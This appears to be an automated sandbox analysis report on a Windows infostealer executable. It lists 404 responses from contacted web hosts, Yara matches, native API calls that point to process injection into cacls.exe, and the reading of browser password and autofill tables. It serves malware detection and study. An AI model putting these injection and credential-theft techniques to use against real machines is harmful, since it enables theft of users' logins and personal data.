                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:54:29 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:54:31 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:54:54 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"6735d5d4-11e4a" Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:54:57 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"6735d5d4-11e4a" Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:55:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"6735d5d4-11e4a" Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:55:03 GMT Content-Type: text/html Content-Length: 73290 Connection: close Vary: Accept-Encoding ETag: "6735d5d4-11e4a"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 03 Dec 2024 13:55:12 GMT server: LiteSpeed Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Tue, 03 Dec 2024 13:55:17 GMT Server: Apache Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Tue, 03 Dec 2024 13:55:20 GMT Server: Apache Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Tue, 03 Dec 2024 13:55:23 GMT Server: Apache Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 601 Connection: close Date: Tue, 03 Dec 2024 13:55:26 GMT Server: Apache Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:55:45 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:55:47 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:55:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 03 Dec 2024 13:55:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:56:40 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:56:43 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 03 Dec 2024 13:56:46 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:56:49 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

                E-Banking Fraud

                Source: Yara match; File source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 2.2.Pp7OXMFwqhXKx5Y.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000002.00000002.179274577947.0000000005D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.182790212280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.182790291540.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_0042C713 NtClose,2_2_0042C713
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E34E0 NtCreateMutant,LdrInitializeThunk,2_2_014E34E0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2BC0 NtQueryInformationToken,LdrInitializeThunk,2_2_014E2BC0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_014E2B90
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2A80 NtClose,LdrInitializeThunk,2_2_014E2A80
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_014E2D10
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2EB0 NtProtectVirtualMemory,LdrInitializeThunk,2_2_014E2EB0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E4260 NtSetContextThread,2_2_014E4260
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E4570 NtSuspendThread,2_2_014E4570
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E29D0 NtWaitForSingleObject,2_2_014E29D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E29F0 NtReadFile,2_2_014E29F0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E38D0 NtGetContextThread,2_2_014E38D0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B00 NtQueryValueKey,2_2_014E2B00
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B10 NtAllocateVirtualMemory,2_2_014E2B10
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B20 NtQueryInformationProcess,2_2_014E2B20
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2BE0 NtQueryVirtualMemory,2_2_014E2BE0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2B80 NtCreateKey,2_2_014E2B80
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2A10 NtWriteFile,2_2_014E2A10
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2AC0 NtEnumerateValueKey,2_2_014E2AC0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2AA0 NtQueryInformationFile,2_2_014E2AA0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2D50 NtWriteVirtualMemory,2_2_014E2D50
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2DC0 NtAdjustPrivilegesToken,2_2_014E2DC0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2DA0 NtReadVirtualMemory,2_2_014E2DA0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2C50 NtUnmapViewOfSection,2_2_014E2C50
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2C10 NtOpenProcess,2_2_014E2C10
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2C20 NtSetInformationFile,2_2_014E2C20
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2C30 NtMapViewOfSection,2_2_014E2C30
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E3C30 NtOpenProcessToken,2_2_014E3C30
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2CD0 NtEnumerateKey,2_2_014E2CD0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2CF0 NtDelayExecution,2_2_014E2CF0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E3C90 NtOpenThread,2_2_014E3C90
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2F00 NtCreateFile,2_2_014E2F00
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2F30 NtOpenDirectoryObject,2_2_014E2F30
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2FB0 NtSetValueKey,2_2_014E2FB0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2E50 NtCreateSection,2_2_014E2E50
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2E00 NtQueueApcThread,2_2_014E2E00
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2EC0 NtQuerySection,2_2_014E2EC0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2ED0 NtResumeThread,2_2_014E2ED0
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exeCode function: 2_2_014E2E80 NtCreateProcessEx,2_2_014E2E80
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DBC6E4 SleepEx,NtCreateSection,3_2_03DBC6E4
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_03DBC8E8 SleepEx,NtResumeThread,3_2_03DBC8E8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782B10 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03782B10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782B00 NtQueryValueKey,LdrInitializeThunk,4_2_03782B00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_03782BC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03782B90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782B80 NtCreateKey,LdrInitializeThunk,4_2_03782B80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782A10 NtWriteFile,LdrInitializeThunk,4_2_03782A10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782AC0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03782AC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782A80 NtClose,LdrInitializeThunk,4_2_03782A80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_037829F0 NtReadFile,LdrInitializeThunk,4_2_037829F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782F00 NtCreateFile,LdrInitializeThunk,4_2_03782F00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4_2_03782E50 NtCreateSection,LdrInitializeThunk,4_2_03782E50
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_03782D10
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782C30 NtMapViewOfSection,LdrInitializeThunk,4_2_03782C30
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782CF0 NtDelayExecution,LdrInitializeThunk,4_2_03782CF0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_037834E0 NtCreateMutant,LdrInitializeThunk,4_2_037834E0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03784260 NtSetContextThread,4_2_03784260
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03784570 NtSuspendThread,4_2_03784570
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782B20 NtQueryInformationProcess,4_2_03782B20
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782BE0 NtQueryVirtualMemory,4_2_03782BE0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782AA0 NtQueryInformationFile,4_2_03782AA0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_037829D0 NtWaitForSingleObject,4_2_037829D0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782F30 NtOpenDirectoryObject,4_2_03782F30
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782FB0 NtSetValueKey,4_2_03782FB0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782E00 NtQueueApcThread,4_2_03782E00
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782ED0 NtResumeThread,4_2_03782ED0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782EC0 NtQuerySection,4_2_03782EC0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782EB0 NtProtectVirtualMemory,4_2_03782EB0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782E80 NtCreateProcessEx,4_2_03782E80
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782D50 NtWriteVirtualMemory,4_2_03782D50
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782DC0 NtAdjustPrivilegesToken,4_2_03782DC0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782DA0 NtReadVirtualMemory,4_2_03782DA0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782C50 NtUnmapViewOfSection,4_2_03782C50
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782C20 NtSetInformationFile,4_2_03782C20
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782C10 NtOpenProcess,4_2_03782C10
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03782CD0 NtEnumerateKey,4_2_03782CD0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_037838D0 NtGetContextThread,4_2_037838D0
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03783C30 NtOpenProcessToken,4_2_03783C30
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_03783C90 NtOpenThread,4_2_03783C90
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035CEDDD NtQueryInformationProcess,NtReadVirtualMemory,4_2_035CEDDD
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035D3318 NtSetContextThread,4_2_035D3318
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035D432D NtMapViewOfSection,4_2_035D432D
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035D3628 NtSuspendThread,4_2_035D3628
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035D46F8 NtUnmapViewOfSection,4_2_035D46F8
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035D3938 NtResumeThread,4_2_035D3938
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035CEDE8 NtQueryInformationProcess,4_2_035CEDE8
                Source: C:\Windows\SysWOW64\cacls.exe Code function: 4_2_035D3C48 NtQueueApcThread,4_2_035D3C48
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 03785050 appears 36 times
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 037BE692 appears 86 times
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 0373B910 appears 272 times
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 037CEF10 appears 105 times
                Source: C:\Windows\SysWOW64\cacls.exe Code function: String function: 03797BE4 appears 96 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: String function: 014E5050 appears 36 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: String function: 0152EF10 appears 105 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: String function: 014F7BE4 appears 95 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: String function: 0149B910 appears 268 times
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Code function: String function: 0151E692 appears 86 times
                Source: Pp7OXMFwqhXKx5Y.exe, 00000000.00000002.178882763555.0000000005D50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameuser.dll" vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000000.00000002.178879281295.0000000004319000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000000.00000002.178878300417.0000000003350000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameuser.dll" vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000000.00000002.178883781428.00000000078B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.0000000001008000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCACLS.EXEj% vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179231505422.000000000159D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe, 00000002.00000002.179230808356.000000000101E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCACLS.EXEj% vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe Binary or memory string: OriginalFilenametHrl.exe0 vs Pp7OXMFwqhXKx5Y.exe
                Source: Pp7OXMFwqhXKx5Y.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Pp7OXMFwqhXKx5Y.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, p1UHuFOvEAowV6fk4b.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, p1UHuFOvEAowV6fk4b.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, PYwgDUyCfG3xhOjec2.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, PYwgDUyCfG3xhOjec2.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, PYwgDUyCfG3xhOjec2.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, PYwgDUyCfG3xhOjec2.cs Security API names: _0020.SetAccessControl
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, PYwgDUyCfG3xhOjec2.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.78b0000.4.raw.unpack, PYwgDUyCfG3xhOjec2.cs Security API names: _0020.AddAccessRule
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, p1UHuFOvEAowV6fk4b.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Pp7OXMFwqhXKx5Y.exe.43e6d48.1.raw.unpack, p1UHuFOvEAowV6fk4b.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/15
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Pp7OXMFwqhXKx5Y.exe.log
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\cacls.exe File created: C:\Users\user\AppData\Local\Temp\G8uE-69OL
                Source: Pp7OXMFwqhXKx5Y.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: cacls.exe, 00000004.00000002.182792565138.00000000081E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: cacls.exe, 00000004.00000003.179407798051.000000000318B000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182789173794.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000003.179407998733.00000000031AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: cacls.exe, 00000004.00000003.179416057961.0000000008238000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000004.00000002.182792565138.0000000008244000.00000004.00000020.00020000.00000000.sdmp, G8uE-69OL.4.dr Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: Pp7OXMFwqhXKx5Y.exe ReversingLabs: Detection: 44%
                Source: unknown Process created: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Process created: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe "C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: edgegdi.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe Section loaded: cryptbase.dll
